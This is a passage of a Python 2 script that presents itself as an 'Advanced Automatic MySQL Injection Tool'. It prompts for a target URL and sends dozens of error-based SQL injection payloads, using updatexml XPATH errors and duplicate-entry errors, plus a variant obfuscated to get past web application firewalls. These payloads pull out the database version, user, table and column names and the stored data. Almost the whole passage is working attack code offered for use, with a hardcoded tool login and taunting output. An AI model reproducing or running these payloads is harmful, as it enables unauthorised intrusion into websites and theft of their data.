  315.         wfxur36 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+12,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  316.         wfpr36 = re.findall("XPATH syntax error: ':(.*)'",wfxur36)
  317.         wfxur37 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+13,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  318.         wfpr37 = re.findall("XPATH syntax error: ':(.*)'",wfxur37)
  319.         wfxur38 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!column_name*/+/*!from*/+iNfOrMaTiOn_ScHeMa./**/columns+where+table_name=0x%s+limit+14,1)),0x3a)--+' % ( wfur, wfxpcol1)).read()
  320.         wfpr38 = re.findall("XPATH syntax error: ':(.*)'",wfxur38)
  321.        
  322.         print "\nColumns : "
  323.         print wfpr24
  324.         print wfpr25
  325.         print wfpr26
  326.         print wfpr27
  327.         print wfpr28
  328.         print wfpr29
  329.         print wfpr30
  330.         print wfpr31
  331.         print wfpr32
  332.         print wfpr33
  333.         print wfpr34
  334.         print wfpr35
  335.         print wfpr36
  336.         print wfpr37
  337.         print wfpr38
  338.        
  339.         print "\n  Note : If you don't want any column just leave it empty :)\n"
  340.         wfxpdt = raw_input("Enter First Column Name : ")
  341.         wfxpdt1 = raw_input("Enter Second Column Name : ")
  342.         wfxpdt2 = raw_input("Enter Third Column Name : ")
  343.         wfxpdt3 = raw_input("Enter Fourth Column Name : ")
  344.         wfxpdt4 = raw_input("Enter Fifth Column Name : ")
  345.         wfxur39 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt, wfxpcol)).read()
  346.         wfpr39 = re.findall("XPATH syntax error: ':(.*)'",wfxur39)
  347.         wfxur40 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt1, wfxpcol)).read()
  348.         wfpr40 = re.findall("XPATH syntax error: ':(.*)'",wfxur40)
  349.         wfxur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt2, wfxpcol)).read()
  350.         wfpr41 = re.findall("XPATH syntax error: ':(.*)'",wfxur41)
  351.         wfxur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt3, wfxpcol)).read()
  352.         wfpr42 = re.findall("XPATH syntax error: ':(.*)'",wfxur42)
  353.         wfxur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt4, wfxpcol)).read()
  354.         wfpr43 = re.findall("XPATH syntax error: ':(.*)'",wfxur43)
  355.         print "\n\nFirst Column Result : "
  356.         print wfpr39
  357.         print "\nSecond Column Result : "
  358.         print wfpr40
  359.         print "\nThird Column Result : "
  360.         print wfpr41
  361.         print "\nFourth Column Result : "
  362.         print wfpr42
  363.         print "\nFifth Column Result : "
  364.         print wfpr43
  365.        
  366.         print "\n\n   All Processes Done!\n   Turning Off All Functions!"
  367.         time.sleep(1)
  368.         print "Press Enter To Exit.."
  369.  
  370. def duplicate_simple():
  371.         time.sleep(.6)
  372.         print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
  373.         print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
  374.         ur = raw_input("Enter URL : ")
  375.         print "\n   Started Injecting\n   Please Wait .. \n"
  376.         xur = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(version()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  377.         pr = re.findall("Duplicate entry '(.*)~",xur,re.MULTILINE)
  378.         xur1 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(database()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  379.         pr1 = re.findall("Duplicate entry '(.*)~",xur1,re.MULTILINE)
  380.         xur2 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(user()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  381.         pr2 = re.findall("Duplicate entry '(.*)~",xur2,re.MULTILINE)
  382.         xur3 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  383.         pr3 = re.findall("Duplicate entry '(.*)~",xur3)
  384.         xur4 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  385.         pr4 = re.findall("Duplicate entry '(.*)~",xur4)
  386.         xur5 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+2,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  387.         pr5 = re.findall("Duplicate entry '(.*)~",xur5)
  388.         xur6 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+3,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  389.         pr6 = re.findall("Duplicate entry '(.*)~",xur6)
  390.         xur7 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+4,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  391.         pr7 = re.findall("Duplicate entry '(.*)~",xur7)
  392.         xur8 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+5,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  393.         pr8 = re.findall("Duplicate entry '(.*)~",xur8)
  394.         xur9 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+6,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  395.         pr9 = re.findall("Duplicate entry '(.*)~",xur9)
  396.         xur10 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+7,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  397.         pr10 = re.findall("Duplicate entry '(.*)~",xur10)
  398.         xur11 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+8,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  399.         pr11 = re.findall("Duplicate entry '(.*)~",xur11)
  400.         xur12 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+9,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  401.         pr12 = re.findall("Duplicate entry '(.*)~",xur12)
  402.         xur13 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+10,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  403.         pr13 = re.findall("Duplicate entry '(.*)~",xur13)
  404.         xur14 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  405.         pr14 = re.findall("Duplicate entry '(.*)~",xur14)
  406.         xur15 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+12,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  407.         pr15 = re.findall("Duplicate entry '(.*)~",xur15)
  408.         xur16 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+13,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  409.         pr16 = re.findall("Duplicate entry '(.*)~",xur16)
  410.         xur17 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+14,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  411.         pr17 = re.findall("Duplicate entry '(.*)~",xur17)
  412.         xur18 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+15,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  413.         pr18 = re.findall("Duplicate entry '(.*)~",xur18)
  414.         xur19 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+16,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  415.         pr19 = re.findall("Duplicate entry '(.*)~",xur19)
  416.         xur20 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+17,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  417.         pr20 = re.findall("Duplicate entry '(.*)~",xur20)
  418.         xur21 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+18,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  419.         pr21 = re.findall("Duplicate entry '(.*)~",xur21)
  420.         xur22 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+19,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  421.         pr22 = re.findall("Duplicate entry '(.*)~",xur22)
  422.         xur23 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+20,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
  423.         pr23 = re.findall("Duplicate entry '(.*)~",xur23)
  424.        
  425.         print "\nDatabase Version : "
  426.         print pr
  427.         print "\nDatabase Name : "
  428.         print pr1
  429.         print "\nDatabase User : "
  430.         print pr2
  431.         print "\nTables :"
  432.         print pr3
  433.         print pr4
  434.         print pr5
  435.         print pr6
  436.         print pr7
  437.         print pr8
  438.         print pr9
  439.         print pr10
  440.         print pr11
  441.         print pr12
  442.         print pr13
  443.         print pr14
  444.         print pr15
  445.         print pr16
  446.         print pr17
  447.         print pr18
  448.         print pr19
  449.         print pr20
  450.         print pr21
  451.         print pr22
  452.         print pr23
  453.        
  454.         print "\n\n"
  455.         xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
  456.         xpcol1 = xpcol.encode("hex")
  457.         xur24 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  458.         pr24 = re.findall("Duplicate entry '(.*)~",xur24)
  459.         xur25 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  460.         pr25 = re.findall("Duplicate entry '(.*)~",xur25)
  461.         xur26 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+2,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  462.         pr26 = re.findall("Duplicate entry '(.*)~",xur26)
  463.         xur27 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+3,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  464.         pr27 = re.findall("Duplicate entry '(.*)~",xur27)
  465.         xur28 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+4,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  466.         pr28 = re.findall("Duplicate entry '(.*)~",xur28)
  467.         xur29 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+5,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  468.         pr29 = re.findall("Duplicate entry '(.*)~",xur29)
  469.         xur30 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+6,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  470.         pr30 = re.findall("Duplicate entry '(.*)~",xur30)
  471.         xur31 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+7,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  472.         pr31 = re.findall("Duplicate entry '(.*)~",xur31)
  473.         xur32 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+8,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  474.         pr32 = re.findall("Duplicate entry '(.*)~",xur32)
  475.         xur33 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+9,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  476.         pr33 = re.findall("Duplicate entry '(.*)~",xur33)
  477.         xur34 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+10,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  478.         pr34 = re.findall("Duplicate entry '(.*)~",xur34)
  479.         xur35 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  480.         pr35 = re.findall("Duplicate entry '(.*)~",xur35)
  481.         xur36 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+12,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  482.         pr36 = re.findall("Duplicate entry '(.*)~",xur36)
  483.         xur37 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+13,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  484.         pr37 = re.findall("Duplicate entry '(.*)~",xur37)
  485.         xur38 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+14,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
  486.         pr38 = re.findall("Duplicate entry '(.*)~",xur38)
  487.        
  488.         print "\nColumns : "
  489.         print pr24
  490.         print pr25
  491.         print pr26
  492.         print pr27
  493.         print pr28
  494.         print pr29
  495.         print pr30
  496.         print pr31
  497.         print pr32
  498.         print pr33
  499.         print pr34
  500.         print pr35
  501.         print pr36
  502.         print pr37
  503.         print pr38
  504.        
  505.         print "\n  Note : If you don't want any column just leave it empty :)\n"
  506.         xpdt = raw_input("Enter First Column Name : ")
  507.         xpdt1 = raw_input("Enter Second Column Name : ")
  508.         xpdt2 = raw_input("Enter Third Column Name : ")
  509.         xpdt3 = raw_input("Enter Fourth Column Name : ")
  510.         xpdt4 = raw_input("Enter Fifth Column Name : ")
  511.         xur39 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt, xpcol)).read()
  512.         pr39 = re.findall("Duplicate entry '(.*)~",xur39)
  513.         xur40 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt1, xpcol)).read()
  514.         pr40 = re.findall("Duplicate entry '(.*)~",xur40)
  515.         xur41 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt2, xpcol)).read()
  516.         pr41 = re.findall("Duplicate entry '(.*)~",xur41)
  517.         xur42 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt3, xpcol)).read()
  518.         pr42 = re.findall("Duplicate entry '(.*)~",xur42)
  519.         xur43 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt4, xpcol)).read()
  520.         pr43 = re.findall("Duplicate entry '(.*)~",xur43)
  521.         print "\n\nFirst Column Result : "
  522.         print pr39
  523.         print "\nSecond Column Result : "
  524.         print pr40
  525.         print "\nThird Column Result : "
  526.         print pr41
  527.         print "\nFourth Column Result : "
  528.         print pr42
  529.         print "\nFifth Column Result : "
  530.         print pr43
  531.        
  532.         print "\n\n   All Processes Done!\n   Turning Off All Functions!"
  533.         time.sleep(1)
  534.         print "Press Enter To Exit.."
  535.  
  536. def acc():
  537.         time.sleep(1)
  538.         print "\n\n         --      Access Granted! "
  539.         time.sleep(.9)
  540.         print "\n           --      lulZ! \n "
  541.         time.sleep(.9)
  542.  
  543. def cred():
  544.        
  545.         os.system("cls")
  546.         time.sleep(1)
  547.         os.system("title      -      Advanced Automatic MySQL Injection Tool     ::   Coded By James   ::")
  548.         usx = 'admin'
  549.         psx = 'adminxxxx'
  550.         print "\n       ###        Please Login To Continue          ###\n" + "-"*55
  551.         pol = raw_input("  Enter Your Username : ")
  552.         pol1 = raw_input("  Enter Your Password : ")
  553.         if(pol != usx):
  554.             print "Username is Incorrect!"
  555.             time.sleep(1)
  556.             sys.exit(0)
  557.         if(pol1 != psx):
  558.             print "Password is Incorrect!"
  559.             time.sleep(1)
  560.             sys.exit(0)
  561.         acc()
  562.            
  563. def duplicate_waf():
  564.         time.sleep(.6)
  565.         print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
  566.         print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
  567.         ur = raw_input("Enter URL : ")
  568.         print "\n   Started Injecting\n   Please Wait .. \n"
  569.         time.sleep(2.5)
  570.         print "   WAF Killed The Injection Process !!\n   Bypassing This Shit!\n"
  571.         xur = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(version()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  572.         pr = re.findall("Duplicate entry '(.*)~",xur,re.MULTILINE)
  573.         xur1 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(database()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  574.         pr1 = re.findall("Duplicate entry '(.*)~",xur1,re.MULTILINE)
  575.         xur2 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(user()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  576.         pr2 = re.findall("Duplicate entry '(.*)~",xur2,re.MULTILINE)
  577.         xur3 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+LIMIT+0,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  578.         pr3 = re.findall("Duplicate entry '(.*)~",xur3)
  579.         xur4 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+1,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
  580.         pr4 = re.findall("Duplicate entry '(.*)~",xur4)
  581.         xur5 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+2,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
